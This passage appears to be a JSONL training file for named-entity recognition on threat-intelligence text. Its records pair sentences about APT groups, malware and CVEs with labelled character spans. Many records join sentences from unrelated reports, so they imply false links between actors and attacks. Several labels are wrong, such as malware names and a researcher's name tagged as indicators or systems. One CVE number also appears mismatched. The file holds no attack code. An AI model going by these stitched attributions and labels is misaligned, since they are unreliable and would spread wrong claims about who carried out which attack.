tracked since 2009 . In addition to the spear phishes , FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers . 
FireEye\u2019s visibility into the operations of APT28 \u2013 a group we believe the Russian government sponsors \u2013 has given us insight into some of the government\u2019s targets , as well as its objectives and the activities designed to further them . FireEye has tracked and profiled APT28 group through multiple investigations , endpoint and network detections , and continuous monitoring . In April 2015 , FireEye uncovered the malicious efforts of APT30 , a suspected China-based threat group . FireEye iSIGHT Intelligence has been tracking a pair of cybercriminals that we refer to as the Vendetta Brothers . Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack .", "spans": [{"start": 4, "end": 14, "label": "Organization"}, {"start": 100, "end": 107, "label": "Organization"}, {"start": 126, "end": 153, "label": "Organization"}, {"start": 158, "end": 177, "label": "Organization"}, {"start": 325, "end": 333, "label": "Organization"}, {"start": 340, "end": 345, "label": "Organization"}, {"start": 446, "end": 465, "label": "Organization"}, {"start": 605, "end": 613, "label": "Organization"}, {"start": 744, "end": 750, "label": "Organization"}, {"start": 766, "end": 791, "label": "Organization"}, {"start": 827, "end": 834, "label": "Organization"}, {"start": 904, "end": 913, "label": "Organization"}, {"start": 996, "end": 1002, "label": "Organization"}, {"start": 1039, "end": 1045, "label": "Malware"}, {"start": 1053, "end": 1070, "label": "Organization"}, {"start": 1205, "end": 1212, "label": "Organization"}, {"start": 1337, "end": 1341, "label": "Vulnerability"}, {"start": 1342, "end": 1350, "label": "Vulnerability"}, {"start": 1375, "end": 1382, "label": "Organization"}, {"start": 1396, "end": 1406, "label": "Organization"}, {"start": 1411, "end": 1419, "label": "Organization"}, {"start": 1448, "end": 1465, "label": 
"Malware"}, {"start": 1525, "end": 1544, "label": "Indicator"}, {"start": 1587, "end": 1594, "label": "Organization"}, {"start": 1628, "end": 1640, "label": "Malware"}, {"start": 1645, "end": 1655, "label": "Malware"}, {"start": 1688, "end": 1691, "label": "Organization"}, {"start": 1744, "end": 1748, "label": "Organization"}, {"start": 1761, "end": 1774, "label": "Organization"}, {"start": 1849, "end": 1864, "label": "Organization"}, {"start": 1892, "end": 1897, "label": "Organization"}, {"start": 1948, "end": 1957, "label": "Organization"}, {"start": 1962, "end": 1970, "label": "Organization"}, {"start": 1973, "end": 1985, "label": "Organization"}, {"start": 2014, "end": 2024, "label": "Organization"}, {"start": 2041, "end": 2046, "label": "Organization"}, {"start": 2094, "end": 2102, "label": "Organization"}, {"start": 2119, "end": 2125, "label": "Organization"}, {"start": 2148, "end": 2153, "label": "System"}, {"start": 2210, "end": 2221, "label": "Organization"}, {"start": 2224, "end": 2231, "label": "Organization"}, {"start": 2296, "end": 2307, "label": "Organization"}, {"start": 2371, "end": 2378, "label": "Organization"}, {"start": 2388, "end": 2393, "label": "Organization"}, {"start": 2403, "end": 2410, "label": "Vulnerability"}, {"start": 2419, "end": 2428, "label": "Organization"}, {"start": 2436, "end": 2449, "label": "Vulnerability"}, {"start": 2462, "end": 2485, "label": "Organization"}, {"start": 2507, "end": 2516, "label": "Organization"}, {"start": 2530, "end": 2535, "label": "Organization"}, {"start": 2625, "end": 2630, "label": "Organization"}, {"start": 2654, "end": 2663, "label": "Organization"}, {"start": 2685, "end": 2701, "label": "Malware"}, {"start": 2730, "end": 2735, "label": "Organization"}, {"start": 2761, "end": 2770, "label": "Malware"}, {"start": 2775, "end": 2782, "label": "Malware"}, {"start": 2819, "end": 2824, "label": "Organization"}, {"start": 2898, "end": 2906, "label": "Organization"}, {"start": 3020, "end": 3024, "label": 
"Organization"}, {"start": 3040, "end": 3049, "label": "Organization"}, {"start": 3112, "end": 3120, "label": "Organization"}, {"start": 3140, "end": 3147, "label": "Organization"}, {"start": 3221, "end": 3228, "label": "Organization"}, {"start": 3242, "end": 3247, "label": "Organization"}, {"start": 3305, "end": 3328, "label": "Organization"}, {"start": 3331, "end": 3348, "label": "Organization"}, {"start": 3355, "end": 3366, "label": "Organization"}, {"start": 3381, "end": 3388, "label": "Organization"}, {"start": 3389, "end": 3395, "label": "Organization"}, {"start": 3492, "end": 3500, "label": "Organization"}, {"start": 3519, "end": 3524, "label": "Organization"}, {"start": 3538, "end": 3545, "label": "Organization"}, {"start": 3560, "end": 3565, "label": "Organization"}, {"start": 3606, "end": 3616, "label": "Organization"}, {"start": 3617, "end": 3627, "label": "Organization"}, {"start": 3663, "end": 3670, "label": "Organization"}, {"start": 3705, "end": 3710, "label": "Organization"}, {"start": 3804, "end": 3822, "label": "Organization"}, {"start": 3825, "end": 3830, "label": "Organization"}, {"start": 3871, "end": 3878, "label": "Organization"}, {"start": 3939, "end": 3966, "label": "Organization"}, {"start": 3980, "end": 3985, "label": "Organization"}, {"start": 4039, "end": 4048, "label": "Organization"}, {"start": 4083, "end": 4088, "label": "Organization"}, {"start": 4114, "end": 4132, "label": "Organization"}, {"start": 4277, "end": 4284, "label": "Organization"}, {"start": 4310, "end": 4315, "label": "Organization"}, {"start": 4434, "end": 4441, "label": "Organization"}, {"start": 4477, "end": 4482, "label": "Organization"}, {"start": 4524, "end": 4538, "label": "Organization"}, {"start": 4619, "end": 4636, "label": "Organization"}, {"start": 4639, "end": 4645, "label": "Organization"}, {"start": 4650, "end": 4659, "label": "Organization"}, {"start": 4708, "end": 4713, "label": "Organization"}, {"start": 4721, "end": 4726, "label": "System"}, 
{"start": 4741, "end": 4754, "label": "Vulnerability"}]} {"text": "The QiAnXin keeps a close eye on activities made by OceanLotus . McAfee concludes that some groups\u2014and especially the Poetry Group \u2014have shifted tactics to use Citadel in ACTs other than what it was originally intended for . McAfee Advanced Threat research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017 . In November 2017 , Talos observed the Group123 , which included a new version of ROKRAT being used in the latest wave of attacks . In addition to TALOS investigation on KONNI , on July 18 2017 , BitDefender released a whitepaper on DarkHotel . According to security 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . ESET has also reported PowerShell scripts being used by Turla to provide direct , in-memory loading and execution of malware . Additionally Kaspersky identified a new backdoor that we attribute with medium confidence to Turla . Researchers at Symantec suspect that Turla used the hijacked network to attack a Middle Eastern government . Symantec researchers have uncovered evidence that the Waterbug APT group has conducted a hostile takeover of an attack platform . Researchers at the Microstep Intelligence Bureau have published a report on targeted attacks on the Ukrainian government that they attribute to the Gamaredon threat actor . Kaspersky found an active campaign by a Chinese APT group we call SixLittleMonkeys that uses a new version of the Microcin Trojan and a RAT that we call HawkEye as a last stager . Trend Micro has previously reported the use of this malware in targeted attacks by the BlackTech group , primarily focused on cyber-espionage in Asia . 
LuckyMouse activity detected by Palo Alto involved the attackers installing web shells on SharePoint servers to compromise government organizations in the Middle East . Talos published its analysis of the BlackWater campaign , related to MuddyWater group . Trend Micro also reported MuddyWater\u2019s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3 . Regarding other groups , Kaspersky discovered new activity related to ZooPark , a cyber-espionage threat actor that has focused mainly on stealing data from Android devices . Recorded Future published an analysis of the infrastructure built by APT33 ( aka Elfin ) to target Saudi organizations .", "spans": [{"start": 4, "end": 11, "label": "Organization"}, {"start": 52, "end": 62, "label": "Organization"}, {"start": 65, "end": 71, "label": "Organization"}, {"start": 125, "end": 130, "label": "Organization"}, {"start": 225, "end": 231, "label": "Organization"}, {"start": 289, "end": 296, "label": "Organization"}, {"start": 374, "end": 376, "label": "Indicator"}, {"start": 418, "end": 436, "label": "Indicator"}, {"start": 444, "end": 451, "label": "Organization"}, {"start": 499, "end": 504, "label": "Organization"}, {"start": 518, "end": 526, "label": "Organization"}, {"start": 626, "end": 631, "label": "Organization"}, {"start": 649, "end": 654, "label": "Malware"}, {"start": 712, "end": 721, "label": "Organization"}, {"start": 746, "end": 776, "label": "Organization"}, {"start": 825, "end": 839, "label": "Indicator"}, {"start": 842, "end": 846, "label": "Organization"}, {"start": 865, "end": 883, "label": "Malware"}, {"start": 898, "end": 903, "label": "Organization"}, {"start": 982, "end": 991, "label": "Organization"}, {"start": 1009, "end": 1017, "label": "Indicator"}, {"start": 1062, "end": 1067, "label": "Organization"}, {"start": 1085, "end": 1093, "label": "Organization"}, {"start": 1107, "end": 1112, "label": "Organization"}, {"start": 1166, "end": 1176, "label": "Organization"}, {"start": 
1179, "end": 1187, "label": "Organization"}, {"start": 1233, "end": 1241, "label": "Organization"}, {"start": 1328, "end": 1357, "label": "Organization"}, {"start": 1409, "end": 1429, "label": "Organization"}, {"start": 1457, "end": 1466, "label": "Organization"}, {"start": 1482, "end": 1491, "label": "Organization"}, {"start": 1548, "end": 1564, "label": "Organization"}, {"start": 1596, "end": 1611, "label": "Malware"}, {"start": 1618, "end": 1621, "label": "Malware"}, {"start": 1662, "end": 1673, "label": "Organization"}, {"start": 1749, "end": 1758, "label": "Organization"}, {"start": 1814, "end": 1824, "label": "Organization"}, {"start": 1846, "end": 1855, "label": "Organization"}, {"start": 1890, "end": 1900, "label": "Malware"}, {"start": 1937, "end": 1961, "label": "Organization"}, {"start": 1983, "end": 1988, "label": "Organization"}, {"start": 2052, "end": 2062, "label": "Organization"}, {"start": 2071, "end": 2082, "label": "Organization"}, {"start": 2097, "end": 2109, "label": "Organization"}, {"start": 2168, "end": 2181, "label": "Indicator"}, {"start": 2200, "end": 2206, "label": "Organization"}, {"start": 2209, "end": 2218, "label": "Organization"}, {"start": 2254, "end": 2261, "label": "Organization"}, {"start": 2341, "end": 2348, "label": "System"}, {"start": 2359, "end": 2374, "label": "Organization"}, {"start": 2428, "end": 2433, "label": "Organization"}, {"start": 2440, "end": 2445, "label": "Organization"}]} {"text": "Donot , named and tracked by PatchSky , is an attack group that mainly targets countries such as Pakistan in South Asia . Early in Q2 , Kaspersky identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code . In a recent campaign , Kaspersky observed ScarCruft using a multi-stage binary to infect several victims and ultimately install a final payload known as ROKRAT \u2013 a cloud service-based backdoor . 
ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . The threat actor behind the campaign , which Kaspersky believes to be the PLATINUM APT group , uses an elaborate , previously unseen , steganographic technique to conceal communication . FireEye defined APT40 as the Chinese state-sponsored threat actor previously reported as TEMP.Periscope , Leviathan and TEMP.Jumper . In January , Kaspersky identified new activity by the Transparent Tribe APT group aka PROJECTM and MYTHIC LEOPARD , a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets . OceanLotus was another actor active during this period , using a new downloader called KerrDown , as reported by Palo Alto . ESET recently uncovered a new addition to OceanLotus\u2019s toolset targeting Mac OS . In mid-2018 , Kaspersky's report on Operation AppleJeus\u201d highlighted the focus of the Lazarus threat actor on cryptocurrency exchanges . Kaspersky also observed some activity from Gaza Team and MuddyWater . Kaspersky wrote about LuckyMouse targeting national data centers in June . Kaspersky also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China . Kaspersky have observed similar activity in the past from groups such as Oilrig and Stonedrill , which leads us to believe the new attacks could be connected , though for now that connection is only assessed as low confidence . In August 2019 , FireEye released the Double Dragon\u201d report on our newest graduated threat group , APT41 . Today , FireEye Intelligence is releasing a comprehensive report detailing APT41 , a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations . Group-IB experts continuously monitor the Silence\u2019 activities . 
Group-IB has uncovered a hacker group , MoneyTaker , attacking banks in the USA and Russia . Group-IB reveals the unknown details of attacks from one of the most notorious APT groups , Lazarus . Finally , Kaspersky produced a summary report on Sofacy\u2019s summertime activity . Kaspersky were also able to produce two reports on Korean speaking actors , specifically involving Scarcruft and Bluenoroff . Analysis of the payload allowed us to confidently link this attack to an actor Kaspersky track as BlackOasis . Kaspersky first became aware of BlackOasis\u2019 activities in May 2016 , while investigating another Adobe Flash zero day .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 29, "end": 37, "label": "Organization"}, {"start": 136, "end": 145, "label": "Organization"}, {"start": 172, "end": 179, "label": "Organization"}, {"start": 199, "end": 212, "label": "Organization"}, {"start": 323, "end": 332, "label": "Organization"}, {"start": 342, "end": 351, "label": "Organization"}, {"start": 453, "end": 459, "label": "Malware"}, {"start": 495, "end": 499, "label": "Organization"}, {"start": 531, "end": 537, "label": "Indicator"}, {"start": 547, "end": 557, "label": "Organization"}, {"start": 614, "end": 619, "label": "Organization"}, {"start": 648, "end": 657, "label": "Organization"}, {"start": 677, "end": 685, "label": "Organization"}, {"start": 790, "end": 797, "label": "Organization"}, {"start": 806, "end": 811, "label": "Organization"}, {"start": 879, "end": 893, "label": "Organization"}, {"start": 896, "end": 905, "label": "Organization"}, {"start": 910, "end": 921, "label": "Organization"}, {"start": 937, "end": 946, "label": "Organization"}, {"start": 1010, "end": 1018, "label": "Organization"}, {"start": 1023, "end": 1037, "label": "Organization"}, {"start": 1136, "end": 1144, "label": "Organization"}, {"start": 1155, "end": 1165, "label": "Organization"}, {"start": 1242, "end": 1250, "label": "Malware"}, {"start": 1268, "end": 1277, 
"label": "Organization"}, {"start": 1280, "end": 1284, "label": "Organization"}, {"start": 1322, "end": 1334, "label": "Organization"}, {"start": 1376, "end": 1387, "label": "Organization"}, {"start": 1448, "end": 1455, "label": "Organization"}, {"start": 1499, "end": 1508, "label": "Organization"}, {"start": 1556, "end": 1566, "label": "Organization"}, {"start": 1569, "end": 1578, "label": "Organization"}, {"start": 1591, "end": 1601, "label": "Organization"}, {"start": 1644, "end": 1653, "label": "Organization"}, {"start": 1675, "end": 1685, "label": "Organization"}, {"start": 1825, "end": 1834, "label": "Organization"}, {"start": 1898, "end": 1904, "label": "Organization"}, {"start": 1909, "end": 1919, "label": "Organization"}, {"start": 2070, "end": 2077, "label": "Organization"}, {"start": 2152, "end": 2157, "label": "Organization"}, {"start": 2168, "end": 2175, "label": "Organization"}, {"start": 2235, "end": 2240, "label": "Organization"}, {"start": 2350, "end": 2361, "label": "Organization"}, {"start": 2385, "end": 2393, "label": "Organization"}, {"start": 2427, "end": 2435, "label": "Organization"}, {"start": 2449, "end": 2457, "label": "Organization"}, {"start": 2489, "end": 2499, "label": "Organization"}, {"start": 2512, "end": 2517, "label": "Organization"}, {"start": 2542, "end": 2550, "label": "Organization"}, {"start": 2634, "end": 2641, "label": "Organization"}, {"start": 2654, "end": 2663, "label": "Organization"}, {"start": 2693, "end": 2701, "label": "Organization"}, {"start": 2724, "end": 2733, "label": "Organization"}, {"start": 2823, "end": 2832, "label": "Organization"}, {"start": 2837, "end": 2847, "label": "Organization"}, {"start": 2929, "end": 2938, "label": "Organization"}, {"start": 2948, "end": 2958, "label": "Organization"}, {"start": 2961, "end": 2970, "label": "Organization"}, {"start": 2993, "end": 3004, "label": "Organization"}, {"start": 3064, "end": 3069, "label": "System"}, {"start": 3070, "end": 3078, "label": 
"Vulnerability"}]} {"text": "After investigation , QiAnXin suspect this attack is carried out by Molerats . It contains a Word document in plaintext ( written to Bienvenue_a_Sahaja_Yoga_Toulouse.doc ) , along with an executable ( Update.exe ) and DLL ( McUpdate.dll ) .", "spans": [{"start": 22, "end": 29, "label": "Organization"}, {"start": 68, "end": 76, "label": "Organization"}, {"start": 93, "end": 97, "label": "System"}, {"start": 133, "end": 169, "label": "Indicator"}, {"start": 201, "end": 211, "label": "Indicator"}, {"start": 218, "end": 221, "label": "System"}, {"start": 224, "end": 236, "label": "Indicator"}]} {"text": "In June 2017 , QiAnXin discovered new malware used by Molerats . We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages .", "spans": [{"start": 15, "end": 22, "label": "Organization"}, {"start": 54, "end": 62, "label": "Organization"}, {"start": 79, "end": 90, "label": "Indicator"}]} {"text": "Last month , QiAnXin captured multiple phishing emails sent by TA505 Group to target financial institutions . Additionally , these decoy documents are hosted on legitimate websites including a government website belonging to the Cambodia Government and in at least once case , Facebook .", "spans": [{"start": 13, "end": 20, "label": "Organization"}, {"start": 63, "end": 68, "label": "Organization"}, {"start": 85, "end": 94, "label": "Organization"}, {"start": 131, "end": 146, "label": "Indicator"}, {"start": 229, "end": 248, "label": "Organization"}, {"start": 277, "end": 285, "label": "Organization"}]} {"text": "QiAnXin confirmed that this is a DarkHydrus Group\u2019s new attack targeting Middle East region . 
However , the unique malware variant , BlackEnergy 3 , reemerged in Ukraine early in 2015 , where we had first found Sandworm Team .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 33, "end": 43, "label": "Organization"}, {"start": 133, "end": 146, "label": "Indicator"}, {"start": 211, "end": 224, "label": "Organization"}]} {"text": "First described by Kaspersky in 2014 and later by Cylance in 2017 , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . The initial indicator of the attack was a malicious Web shell that was detected on an IIS server , coming out of the w3wp.exe process .", "spans": [{"start": 19, "end": 28, "label": "Organization"}, {"start": 50, "end": 57, "label": "Organization"}, {"start": 68, "end": 75, "label": "System"}, {"start": 245, "end": 254, "label": "System"}, {"start": 279, "end": 282, "label": "System"}, {"start": 310, "end": 318, "label": "Indicator"}]} {"text": "It\u2019s now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware , \u201d said Dennis Schwarz , research analyst on Arbor , in an interview with Threatpost . We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . Instead , sensitive KHNP documents were leaked by the actors as part of an effort to exaggerate the access they had and embarrass the South Korean Government , a technique we assess North Korea would turn to again in order to instill fear and/or meet domestic propaganda aims . North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. 
and South Korea but the global financial system and nations worldwide .", "spans": [{"start": 129, "end": 136, "label": "System"}, {"start": 146, "end": 160, "label": "System"}, {"start": 183, "end": 188, "label": "Organization"}, {"start": 253, "end": 259, "label": "Organization"}, {"start": 308, "end": 318, "label": "Organization"}, {"start": 332, "end": 340, "label": "Organization"}, {"start": 461, "end": 475, "label": "Indicator"}, {"start": 495, "end": 501, "label": "Organization"}, {"start": 575, "end": 598, "label": "Organization"}, {"start": 856, "end": 865, "label": "Organization"}, {"start": 877, "end": 884, "label": "Organization"}]} {"text": "After thorough analysis , ESET researchers are highly confident that this campaign is run by the OceanLotus group , also known as APT32 and APT-C-00 . The malware may inject itself into browser processes and explorer.exe .", "spans": [{"start": 26, "end": 30, "label": "Organization"}, {"start": 97, "end": 107, "label": "Organization"}, {"start": 130, "end": 135, "label": "Organization"}, {"start": 140, "end": 148, "label": "Organization"}, {"start": 155, "end": 162, "label": "Malware"}, {"start": 208, "end": 220, "label": "Indicator"}]} {"text": "360 Helios Team captured the first Trojan of the Poison Ivy Group in December 2007 . In the last few weeks , FormBook was seen downloading other malware families such as NanoCore .", "spans": [{"start": 0, "end": 15, "label": "Organization"}, {"start": 49, "end": 59, "label": "System"}, {"start": 109, "end": 117, "label": "Indicator"}, {"start": 170, "end": 178, "label": "Indicator"}]} {"text": "Through research , 360 Helios Team has found that , since 2007 , the Poison Ivy Group has carried out 11 years of cyber espionage campaigns against Chinese key units and departments , such as national defense , government , science and technology , education and maritime agencies . 
The vulnerability is bypassing most mitigations; however , as noted above , FireEye email and network products detect the malicious documents .", "spans": [{"start": 19, "end": 34, "label": "Organization"}, {"start": 69, "end": 85, "label": "Organization"}, {"start": 192, "end": 208, "label": "Organization"}, {"start": 211, "end": 221, "label": "Organization"}, {"start": 224, "end": 231, "label": "Organization"}, {"start": 236, "end": 246, "label": "Organization"}, {"start": 249, "end": 258, "label": "Organization"}, {"start": 263, "end": 280, "label": "Organization"}, {"start": 359, "end": 366, "label": "Organization"}, {"start": 367, "end": 372, "label": "System"}, {"start": 405, "end": 424, "label": "Indicator"}]} {"text": "In addition , Antiy Lab revealed the APT organization Green Spot on September 19 , 2018 . Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 54, "end": 64, "label": "Organization"}, {"start": 161, "end": 174, "label": "Vulnerability"}, {"start": 190, "end": 193, "label": "System"}]} {"text": "Recently , the 360 Core Security discovered an APT attack code named as APT-C-26 against cryptocurrency institutions and related individuals . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 .", "spans": [{"start": 15, "end": 32, "label": "Organization"}, {"start": 72, "end": 80, "label": "Organization"}, {"start": 187, "end": 190, "label": "System"}, {"start": 222, "end": 231, "label": "Organization"}, {"start": 232, "end": 239, "label": "System"}, {"start": 267, "end": 280, "label": "Vulnerability"}]} {"text": "This APT attack was analyzed and attributed upon the detection and 360 Core Security now confirmed its association with the APT-C-06 Group . 
In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros .", "spans": [{"start": 67, "end": 84, "label": "Organization"}, {"start": 124, "end": 132, "label": "Organization"}, {"start": 169, "end": 174, "label": "Organization"}, {"start": 189, "end": 205, "label": "Indicator"}]} {"text": "In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group\u2019s new APT attack using 0-day vulnerabilities (CVE-2018-8174) in the wild . APT32 actors continue to deliver the malicious attachments via spear-phishing emails .", "spans": [{"start": 22, "end": 39, "label": "Organization"}, {"start": 72, "end": 80, "label": "Organization"}, {"start": 132, "end": 147, "label": "Vulnerability"}, {"start": 162, "end": 167, "label": "Organization"}, {"start": 199, "end": 220, "label": "Indicator"}, {"start": 240, "end": 246, "label": "System"}]} {"text": "ESET researchers have dissected some of the latest additions to the malicious toolkit of the Advanced Persistent Threat (APT) group known as OceanLotus , also dubbed APT32 and APT-C-00 . Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 68, "end": 85, "label": "System"}, {"start": 141, "end": 151, "label": "Organization"}, {"start": 166, "end": 171, "label": "Organization"}, {"start": 176, "end": 184, "label": "Organization"}, {"start": 267, "end": 275, "label": "Indicator"}]} {"text": "Earlier this year , our colleagues at Symantec uncovered an interesting story about the use of Equation group exploitation tools by an alleged Chinese group named Buckeye a.k.a APT3 , or UPS team . 
February saw three particularly interesting publications on the topic of macOS malware: a Trojan Cocoa application that sends system information including keychain data back to the attacker , a macOS version of APT28\u2019s Xagent malware , and a new Trojan ransomware .", "spans": [{"start": 38, "end": 46, "label": "Organization"}, {"start": 95, "end": 103, "label": "Organization"}, {"start": 163, "end": 170, "label": "Organization"}, {"start": 177, "end": 181, "label": "Organization"}, {"start": 288, "end": 294, "label": "Malware"}, {"start": 379, "end": 387, "label": "Organization"}, {"start": 409, "end": 416, "label": "Organization"}, {"start": 444, "end": 461, "label": "Indicator"}]} {"text": "In addition , OceanLotus is also known to use \u2018watering hole attacks\u2019 , which involve the compromise of a website that the victim is likely to visit . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware .", "spans": [{"start": 14, "end": 24, "label": "Organization"}, {"start": 180, "end": 199, "label": "Indicator"}, {"start": 211, "end": 224, "label": "Vulnerability"}, {"start": 250, "end": 259, "label": "Malware"}, {"start": 260, "end": 267, "label": "Malware"}]} {"text": "Kaspersky found Zebrocy deploying a compiled Python script , which we call PythocyDbg , within a Southeast Asian foreign affairs organization: this module primarily provides for the stealthy collection of network proxy and communications debug capabilities . 
The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 16, "end": 23, "label": "Organization"}, {"start": 45, "end": 58, "label": "System"}, {"start": 75, "end": 85, "label": "System"}, {"start": 271, "end": 288, "label": "Indicator"}, {"start": 339, "end": 352, "label": "Vulnerability"}, {"start": 458, "end": 465, "label": "Indicator"}]} {"text": "ESET researchers have investigated a distinctive backdoor used by the notorious APT group known as Turla (or Snake , or Uroburos) to siphon off sensitive communications from the authorities of at least three European countries . This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 99, "end": 104, "label": "Organization"}, {"start": 109, "end": 114, "label": "Organization"}, {"start": 120, "end": 129, "label": "Organization"}, {"start": 278, "end": 314, "label": "Indicator"}]} {"text": "Dragos has reported that XENOTIME , the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017 , has expanded its focus beyond the oil and gas industries . 
To install and register the malicious shim database on a system , FIN7 used a custom Base64 encoded PowerShell script , which ran the sdbinst.exe\u201d utility to register a custom shim database file containing a patch onto a system .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 25, "end": 33, "label": "Organization"}, {"start": 61, "end": 67, "label": "Organization"}, {"start": 186, "end": 189, "label": "Organization"}, {"start": 194, "end": 208, "label": "Organization"}, {"start": 277, "end": 281, "label": "Organization"}, {"start": 311, "end": 328, "label": "Malware"}, {"start": 345, "end": 357, "label": "Indicator"}]} {"text": "ESET researchers have observed a significant change in the campaign of the infamous espionage group . During the investigations , Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of services.exe\u201d with their CARBANAK payload .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 94, "end": 99, "label": "Organization"}, {"start": 130, "end": 138, "label": "Organization"}, {"start": 153, "end": 157, "label": "Organization"}, {"start": 234, "end": 247, "label": "Indicator"}, {"start": 259, "end": 267, "label": "Malware"}]} {"text": "On the technical side , since mid-January Kaspersky researchers have been tracking an active Turla campaign targeting government bodies in Turkmenistan and Tajikistan . 
We have not yet identified FIN7\u2019s ultimate goal in this campaign , as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft .", "spans": [{"start": 42, "end": 51, "label": "Organization"}, {"start": 93, "end": 98, "label": "Organization"}, {"start": 118, "end": 128, "label": "Organization"}, {"start": 196, "end": 202, "label": "Organization"}, {"start": 282, "end": 298, "label": "Indicator"}]} {"text": "Kaspersky also published details on how Zebrocy has added the Go\u201d language to its arsenal \u2013 the first time that we have observed a well-known APT threat actor deploy malware with this compiled , open source language . Figure 1 shows a sample phishing email used by HawkEye operators in this latest campaign .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 40, "end": 47, "label": "Organization"}, {"start": 242, "end": 256, "label": "Indicator"}]} {"text": "ESET researchers have found that Turla , the notorious state-sponsored cyberespionage group , has added a fresh weapon to its arsenal that is being used in new campaigns targeting embassies and consulates in the post-Soviet states . Many groups leverage the regsvr32.exe application whitelisting bypass , including APT19 in their 2017 campaign against law firms .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 33, "end": 38, "label": "Organization"}, {"start": 258, "end": 270, "label": "Indicator"}, {"start": 315, "end": 320, "label": "Organization"}, {"start": 352, "end": 361, "label": "Organization"}]} {"text": "Turla has been operating for a number of years and its activities have been monitored and analyzed by ESET research laboratories . 
The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 102, "end": 106, "label": "Organization"}, {"start": 135, "end": 142, "label": "Indicator"}, {"start": 299, "end": 318, "label": "Malware"}, {"start": 331, "end": 339, "label": "Organization"}]} {"text": "Kaspersky researchers attribute the campaign , which we call SpoiledLegacy\u201d , to the LuckyMouse APT group (aka EmissaryPanda and APT27) . The malware appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD to decrypt the data .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 85, "end": 95, "label": "Organization"}, {"start": 111, "end": 124, "label": "Organization"}, {"start": 129, "end": 135, "label": "Organization"}, {"start": 142, "end": 149, "label": "Indicator"}, {"start": 188, "end": 203, "label": "Indicator"}]} {"text": "Further tracking of the Lazarus\u2019s activities has enabled Kaspersky researchers to discover a new operation , active since at least November 2018 , which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers . 
The malware then builds two DLLs in memory \u2013 they are 32 and 64-bit DLLs that have identical functionality .", "spans": [{"start": 24, "end": 33, "label": "Organization"}, {"start": 57, "end": 66, "label": "Organization"}, {"start": 162, "end": 172, "label": "System"}, {"start": 229, "end": 244, "label": "Organization"}, {"start": 251, "end": 258, "label": "Indicator"}, {"start": 275, "end": 279, "label": "Indicator"}]} {"text": "However , over the last nine campaigns since Trend Micro\u2018s June report , TA505 also started using .ISO image attachments as the point of entry , as well as a .NET downloader , a new style for macro delivery , a newer version of ServHelper , and a .DLL variant of FlawedAmmyy downloader . The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments -m security .", "spans": [{"start": 45, "end": 58, "label": "Organization"}, {"start": 73, "end": 78, "label": "Organization"}, {"start": 158, "end": 173, "label": "System"}, {"start": 228, "end": 238, "label": "System"}, {"start": 247, "end": 259, "label": "Malware"}, {"start": 292, "end": 299, "label": "Indicator"}, {"start": 338, "end": 349, "label": "Indicator"}]} {"text": "In this blog post , FireEye researchers are going to examine a recent instance where FireEye Managed Defense came toe-to-toe with APT41 . The malware then writes the R resource data to the file C:\\WINDOWS\\tasksche.exe .", "spans": [{"start": 20, "end": 27, "label": "Organization"}, {"start": 85, "end": 92, "label": "Organization"}, {"start": 130, "end": 135, "label": "Organization"}, {"start": 142, "end": 149, "label": "Indicator"}, {"start": 189, "end": 193, "label": "Indicator"}, {"start": 194, "end": 217, "label": "Indicator"}]} {"text": "The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802) , and the ability to incorporate them into operations . 
